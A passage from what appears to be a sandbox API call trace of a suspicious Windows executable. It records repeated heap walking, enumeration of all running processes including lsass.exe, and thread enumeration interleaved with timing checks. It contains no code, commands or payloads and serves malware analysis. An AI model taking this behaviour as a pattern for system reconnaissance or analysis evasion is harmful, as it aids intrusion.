Flags=0x0, Size=0x64) returned 0x8240a0 [0211.726] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.726] Heap32Next (lphe=0x397efc0) returned 1 [0211.751] GetTickCount () returned 0x1138c0a [0211.751] GetCurrentThreadId () returned 0x1cc [0211.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.751] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.751] Heap32Next (lphe=0x397efc0) returned 1 [0211.776] GetTickCount () returned 0x1138c29 [0211.776] GetCurrentThreadId () returned 0x1cc [0211.777] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.777] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.777] Heap32Next (lphe=0x397efc0) returned 1 [0211.804] GetTickCount () returned 0x1138c39 [0211.804] GetCurrentThreadId () returned 0x1cc [0211.804] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.804] Heap32Next (lphe=0x397efc0) returned 1 [0211.829] GetTickCount () returned 0x1138c58 [0211.829] GetCurrentThreadId () returned 0x1cc [0211.829] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.829] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.829] Heap32Next (lphe=0x397efc0) returned 1 [0211.854] GetTickCount () returned 0x1138c77 [0211.854] GetCurrentThreadId () returned 0x1cc [0211.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.854] Heap32Next (lphe=0x397efc0) returned 1 [0211.878] GetTickCount () returned 0x1138c87 [0211.878] GetCurrentThreadId () returned 0x1cc [0211.878] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.878] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.878] Heap32Next (lphe=0x397efc0) returned 1 [0211.918] GetTickCount () returned 0x1138cb6 [0211.918] GetCurrentThreadId () returned 0x1cc [0211.918] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.918] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.918] Heap32Next (lphe=0x397efc0) returned 1 [0211.943] GetTickCount () returned 0x1138cc5 [0211.943] GetCurrentThreadId () returned 0x1cc [0211.943] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.943] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.943] Heap32Next (lphe=0x397efc0) returned 1 [0211.967] GetTickCount () returned 0x1138ce5 [0211.967] Heap32ListNext (hSnapshot=0x62c, lphl=0x397f454) returned 1 [0211.968] GetTickCount () returned 0x1138ce5 [0211.968] GetTickCount () returned 0x1138ce5 [0211.968] Process32First (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.969] GetCurrentThreadId () returned 0x1cc [0211.969] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.969] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.969] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x54, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.970] GetTickCount () returned 0x1138ce5 [0211.970] GetCurrentThreadId () returned 0x1cc [0211.971] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.971] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.971] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.972] GetTickCount () returned 0x1138ce5 [0211.972] GetCurrentThreadId () returned 0x1cc [0211.972] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.972] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.972] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.973] GetTickCount () returned 0x1138ce5 [0211.973] GetCurrentThreadId () returned 0x1cc [0211.973] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.973] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.973] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.974] GetTickCount () returned 0x1138ce5 [0211.974] GetCurrentThreadId () returned 0x1cc [0211.974] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.974] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.974] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.975] GetTickCount () returned 0x1138ce5 [0211.975] GetCurrentThreadId () returned 0x1cc [0211.975] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.975] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.975] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.976] GetTickCount () returned 0x1138cf4 [0211.976] GetCurrentThreadId () returned 0x1cc [0211.976] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.977] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.977] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x184, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.978] GetTickCount () returned 0x1138cf4 [0211.978] GetCurrentThreadId () returned 0x1cc [0211.978] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.978] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.978] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x184, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.979] GetTickCount () returned 0x1138cf4 [0211.979] GetCurrentThreadId () returned 0x1cc [0211.979] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.979] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.979] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.980] GetTickCount () returned 0x1138cf4 [0211.980] GetCurrentThreadId () returned 0x1cc [0211.980] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.980] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.980] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.981] GetTickCount () returned 0x1138cf4 [0211.981] GetCurrentThreadId () returned 0x1cc [0211.981] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.981] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.981] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.982] GetTickCount () returned 0x1138cf4 [0211.982] GetCurrentThreadId () returned 0x1cc [0211.982] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.982] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.982] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.983] GetTickCount () returned 0x1138cf4 [0211.983] GetCurrentThreadId () returned 0x1cc [0211.984] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.984] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.984] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.985] GetTickCount () returned 0x1138cf4 [0211.985] GetCurrentThreadId () returned 0x1cc [0211.985] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.985] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.985] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.986] GetTickCount () returned 0x1138cf4 [0211.986] GetCurrentThreadId () returned 0x1cc [0211.986] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.986] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.986] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.987] GetTickCount () returned 0x1138cf4 [0211.987] GetCurrentThreadId () returned 0x1cc [0211.987] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.987] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.987] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.988] GetTickCount () returned 0x1138cf4 [0211.988] GetCurrentThreadId () returned 0x1cc [0211.988] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.988] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.988] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.989] GetTickCount () returned 0x1138cf4 [0211.989] GetCurrentThreadId () returned 0x1cc [0211.989] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.989] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.989] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.990] GetTickCount () returned 0x1138cf4 [0211.990] GetCurrentThreadId () returned 0x1cc [0211.990] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.990] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.990] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0211.992] GetTickCount () returned 0x1138d04 [0211.992] GetCurrentThreadId () returned 0x1cc [0211.992] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.992] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.992] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.993] GetTickCount () returned 0x1138d04 [0211.993] GetCurrentThreadId () returned 0x1cc [0211.993] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.993] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.993] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0211.994] GetTickCount () returned 0x1138d04 [0211.994] GetCurrentThreadId () returned 0x1cc [0211.994] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.994] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.994] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x46c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.995] GetTickCount () returned 0x1138d04 [0211.995] GetCurrentThreadId () returned 0x1cc [0211.995] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.995] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.995] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.996] GetTickCount () returned 0x1138d04 [0211.996] GetCurrentThreadId () returned 0x1cc [0211.996] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.996] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.996] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x4a4, pcPriClassBase=13, dwFlags=0x0, szExeFile="1A3E.TMP.EXE.exe")) returned 1 [0211.997] GetTickCount () returned 0x1138d04 [0211.997] GetCurrentThreadId () returned 0x1cc [0211.997] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.997] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.997] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0211.998] GetTickCount () returned 0x1138d04 [0211.998] GetCurrentThreadId () returned 0x1cc [0211.998] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.998] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.998] Process32Next (in: hSnapshot=0x62c, lppe=0x397f258 | out: lppe=0x397f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0211.999] GetTickCount () returned 0x1138d04 [0211.999] Thread32First (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.000] GetCurrentThreadId () returned 0x1cc [0212.000] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.000] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.000] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.001] GetTickCount () returned 0x1138d04 [0212.001] GetCurrentThreadId () returned 0x1cc [0212.001] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.001] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.001] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.002] GetTickCount () returned 0x1138d04 [0212.002] GetCurrentThreadId () returned 0x1cc [0212.002] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.002] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.002] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.003] GetTickCount () returned 0x1138d04 [0212.003] GetCurrentThreadId () returned 0x1cc [0212.003] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.003] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.003] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.004] GetTickCount () returned 0x1138d04 [0212.004] GetCurrentThreadId () returned 0x1cc [0212.004] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.004] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.004] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.005] GetTickCount () returned 0x1138d04 [0212.005] GetCurrentThreadId () returned 0x1cc [0212.005] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.005] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.005] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.006] GetTickCount () returned 0x1138d04 [0212.006] GetCurrentThreadId () returned 0x1cc [0212.006] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.006] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.006] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.007] GetTickCount () returned 0x1138d13 [0212.007] GetCurrentThreadId () returned 0x1cc [0212.007] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.007] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.007] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.008] GetTickCount () returned 0x1138d13 [0212.008] GetCurrentThreadId () returned 0x1cc [0212.008] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.008] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.008] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.009] GetTickCount () returned 0x1138d13 [0212.009] GetCurrentThreadId () returned 0x1cc [0212.009] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.009] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.009] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.010] GetTickCount () returned 0x1138d13 [0212.010] GetCurrentThreadId () returned 0x1cc [0212.010] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.010] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.010] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.011] GetTickCount () returned 0x1138d13 [0212.011] GetCurrentThreadId () returned 0x1cc [0212.011] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.011] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.011] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.012] GetTickCount () returned 0x1138d13 [0212.012] GetCurrentThreadId () returned 0x1cc [0212.012] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.012] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.012] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.013] GetTickCount () returned 0x1138d13 [0212.013] GetCurrentThreadId () returned 0x1cc [0212.013] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.013] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.013] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.014] GetTickCount () returned 0x1138d13 [0212.014] GetCurrentThreadId () returned 0x1cc [0212.014] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.014] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.014] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.015] GetTickCount () returned 0x1138d13 [0212.015] GetCurrentThreadId () returned 0x1cc [0212.015] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.015] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.015] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.016] GetTickCount () returned 0x1138d13 [0212.016] GetCurrentThreadId () returned 0x1cc [0212.016] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.016] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.016] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.017] GetTickCount () returned 0x1138d13 [0212.017] GetCurrentThreadId () returned 0x1cc [0212.017] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.017] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.017] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.018] GetTickCount () returned 0x1138d13 [0212.018] GetCurrentThreadId () returned 0x1cc [0212.018] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.018] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.018] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.019] GetTickCount () returned 0x1138d13 [0212.019] GetCurrentThreadId () returned 0x1cc [0212.019] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0212.019] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0212.019] Thread32Next (hSnapshot=0x62c, lpte=0x397f434) returned 1 [0212.020] GetTickCount () returned 